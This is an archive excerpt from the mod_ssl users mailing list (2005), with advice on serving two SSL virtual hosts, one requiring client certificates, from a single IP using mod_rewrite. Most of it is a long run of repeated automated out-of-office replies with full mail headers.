maybe you should reach your goal with some mod_rewrite tricks. The
points mentioned at http://www.modssl.org/docs/2.8/ssl_faq.html#vhosts
are still valid, only one vhost per ip. You could give mod_rewrite a try
to push clients to different directories which are configured for secure
and public ssl access.

Try something like this:

   ServerName www.vhost1.com
   ServerAlias www.vhost2.com

   SSLEngine on
   SSLVerifyClient none
   SSLCACertificateFile conf/ssl.crt/ca.crt

   
     SSLVerifyClient require
     SSLVerifyDepth 1
   

   RewriteEngine on
   #RewriteLogLevel 7
   #RewriteLog  logs/RewriteLog
   #RewriteCond %{SERVER_NAME}
   RewriteCond %{HTTP_HOST}               www.vhost1.com
   RewriteRule ^(/index.htm)|(/)|()$      /ssl/securedir [R,L]

   RewriteCond %{HTTP_HOST}               www.vhost2.com
   RewriteRule ^(/index.htm)|(/)|()$      /ssl/public [R,L]

This would just be a starting switch, modify the regexp to push all
desired content into the matching secure location (see
http://www.modssl.org/docs/2.8/ssl_howto.html#ToC6). I personally did
not try this, but if this does not work maybe mod_setenvif can be used
to distinguish the different names.

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 09:50:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C0FCB14D9D2; Fri, 24 Jun 2005 09:50:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id 798E214D9AC
	for ; Fri, 24 Jun 2005 09:50:06 +0200 (CEST)
Received: from werum815.werum.net (werum815.werum.net [172.20.104.15])
	by mailprimary.werum.de (Postfix) with ESMTP id D01A0F9454
	for ; Fri, 24 Jun 2005 09:51:44 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 49C12932A7;
	Fri, 24 Jun 2005 09:50:03 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 32732-01; Fri, 24 Jun 2005 09:48:10 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id CA3F2932A5
	for ; Fri, 24 Jun 2005 09:50:02 +0200 (CEST)
Message-ID: <42BBBB2C.7040106@werum.de>
Date: Fri, 24 Jun 2005 09:50:04 +0200
From: Eckard Wille 
User-Agent: Mozilla Thunderbird 1.6.2.0c (Windows/20050317)
X-Accept-Language: de, en-US
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL Client Auth with Virtual Hosts
References: 
In-Reply-To: 
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.504 tagged_above=-999 required=5 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hoda Nadeem schrieb:
> A team member was able to find a working solution (issue: single IP, two
> domains, one domain requires client auth, the other domain plain SSL,
> both functional with same apache instance using virtual hosts):

Hi Hoda,

test the following:

Close all browsers to get a new clean session (start new IE). Use a 
browser with definitely no included user cert (sometimes free 
email-certs are also enabled for client authentification, backup and 
remove). Visit your second defined . Asking for an user cert?

According to your setup all request can go to only one of the 
configured vhost, do some more test with clean browsers (=> close your 
browsers after each test to ensure the session is really closed). To 
ensure you are on the right vhost it would make sense to use different 
docroots with different content showing right away where you are hitting.

Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 09:55:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B085114D9D2; Fri, 24 Jun 2005 09:55:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton10-out.abnamro.nl (triton10.abnamro.nl [167.202.193.26])
	by master.modssl.org (Postfix) with ESMTP id 8AC4B14D9AC
	for ; Fri, 24 Jun 2005 09:55:51 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001.inet.nl.abnamro.com [10.124.6.13])
	by triton10-out.abnamro.nl (Postfix) with ESMTP id 0C02C3A055
	for ; Fri, 24 Jun 2005 09:55:51 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 09:53:39 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 09:55:50 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 09:59:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1D12D14D9DC; Fri, 24 Jun 2005 09:59:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton08-out.abnamro.nl (triton08.abnamro.nl [167.202.193.24])
	by master.modssl.org (Postfix) with ESMTP id DD02014D9D0
	for ; Fri, 24 Jun 2005 09:59:51 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton08-out.abnamro.nl (Postfix) with ESMTP id 5EDA2981E
	for ; Fri, 24 Jun 2005 09:59:51 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 09:57:35 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 09:59:51 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:03:46 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 018DD14D9D2; Fri, 24 Jun 2005 10:03:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton07-out.inet.nl.abnamro.com (triton07.abnamro.nl [167.202.193.23])
	by master.modssl.org (Postfix) with ESMTP id C4C9714D9AC
	for ; Fri, 24 Jun 2005 10:03:45 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton07-out.inet.nl.abnamro.com (Postfix) with ESMTP id 1182F3C0C
	for ; Fri, 24 Jun 2005 10:03:45 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:00:19 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:03:44 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:07:57 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3B42014D9DF; Fri, 24 Jun 2005 10:07:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton09-out.inet.nl.abnamro.com (triton09.abnamro.nl [167.202.193.25])
	by master.modssl.org (Postfix) with ESMTP id C9CAB14D9D0
	for ; Fri, 24 Jun 2005 10:07:56 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton09-out.inet.nl.abnamro.com (Postfix) with ESMTP id 310C87288
	for ; Fri, 24 Jun 2005 10:07:56 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:05:37 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:07:56 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:12:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2DA5514D9D0; Fri, 24 Jun 2005 10:12:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton08-out.abnamro.nl (triton08.abnamro.nl [167.202.193.24])
	by master.modssl.org (Postfix) with ESMTP id E399514D9AC
	for ; Fri, 24 Jun 2005 10:12:57 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton08-out.abnamro.nl (Postfix) with ESMTP id C95A99A51
	for ; Fri, 24 Jun 2005 10:12:57 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:10:34 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:12:57 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:18:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7AB1614D9DC; Fri, 24 Jun 2005 10:18:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton09-out.inet.nl.abnamro.com (triton09.abnamro.nl [167.202.193.25])
	by master.modssl.org (Postfix) with ESMTP id A89E714D9CB
	for ; Fri, 24 Jun 2005 10:18:20 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton09-out.inet.nl.abnamro.com (Postfix) with ESMTP id D5ABD759F
	for ; Fri, 24 Jun 2005 10:18:19 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:15:45 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:18:19 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:24:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7198014D9DC; Fri, 24 Jun 2005 10:24:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton09-out.inet.nl.abnamro.com (triton09.abnamro.nl [167.202.193.25])
	by master.modssl.org (Postfix) with ESMTP id 09C5B14D9C6
	for ; Fri, 24 Jun 2005 10:24:01 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton09-out.inet.nl.abnamro.com (Postfix) with ESMTP id E6769702B
	for ; Fri, 24 Jun 2005 10:24:00 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:21:46 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:24:00 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:30:31 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9539714D9DC; Fri, 24 Jun 2005 10:30:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton10-out.abnamro.nl (triton10.abnamro.nl [167.202.193.26])
	by master.modssl.org (Postfix) with ESMTP id 700B714D9C6
	for ; Fri, 24 Jun 2005 10:30:30 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001.inet.nl.abnamro.com [10.124.6.13])
	by triton10-out.abnamro.nl (Postfix) with ESMTP id D168E3A04B
	for ; Fri, 24 Jun 2005 10:30:30 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:27:48 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:30:30 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:35:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3E3F114D9DF; Fri, 24 Jun 2005 10:35:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton10-out.abnamro.nl (triton10.abnamro.nl [167.202.193.26])
	by master.modssl.org (Postfix) with ESMTP id 138F414D9C6
	for ; Fri, 24 Jun 2005 10:35:40 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001.inet.nl.abnamro.com [10.124.6.13])
	by triton10-out.abnamro.nl (Postfix) with ESMTP id 7F9DA3A036
	for ; Fri, 24 Jun 2005 10:35:40 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:33:15 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:35:40 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:37:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DAAC014D9DF; Fri, 24 Jun 2005 10:37:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton07-out.inet.nl.abnamro.com (triton07.abnamro.nl [167.202.193.23])
	by master.modssl.org (Postfix) with ESMTP id 91B7E14D9AC
	for ; Fri, 24 Jun 2005 10:37:42 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton07-out.inet.nl.abnamro.com (Postfix) with ESMTP id D349D3C97
	for ; Fri, 24 Jun 2005 10:37:42 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:35:22 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:37:42 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:43:37 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 46F0B14D9E2; Fri, 24 Jun 2005 10:43:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton08-out.abnamro.nl (triton08.abnamro.nl [167.202.193.24])
	by master.modssl.org (Postfix) with ESMTP id 237C914D9CB
	for ; Fri, 24 Jun 2005 10:43:34 +0200 (CEST)
Received: from aaamsr001.abnamro.com (aaamsr001 [10.124.6.13])
	by triton08-out.abnamro.nl (Postfix) with ESMTP id 9FC1A8EAD
	for ; Fri, 24 Jun 2005 10:43:34 +0200 (CEST)
Subject: Padraic Coyne/NL/ABNAMRO/NL is out of the office.
From: padraic.coyne@nl.abnamro.com
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 24 Jun 2005 10:41:22 +0200
X-MIMETrack: Serialize by Router on AAAMSR001/HUB/ABNAMRO/NL(Release 6.0.3|September 26, 2003) at
 06/24/2005 10:43:34 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: padraic.coyne@nl.abnamro.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





I will be out of the office starting  24-06-2005 and will not return until
28-06-2005.

I will respond to your message when I return.

I can be contacted at the following email address:
padraic.coyne@uk.ibm.com
---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 24 10:49:18 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8B9F714D9D2; Fri, 24 Jun 2005 10:49:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from triton09-out.inet.nl.abnamro.com (triton09.abnamro.nl [167.202.193.25])
	by master.modssl.org (Postfix) with ESMTP id 6166B14D9C6
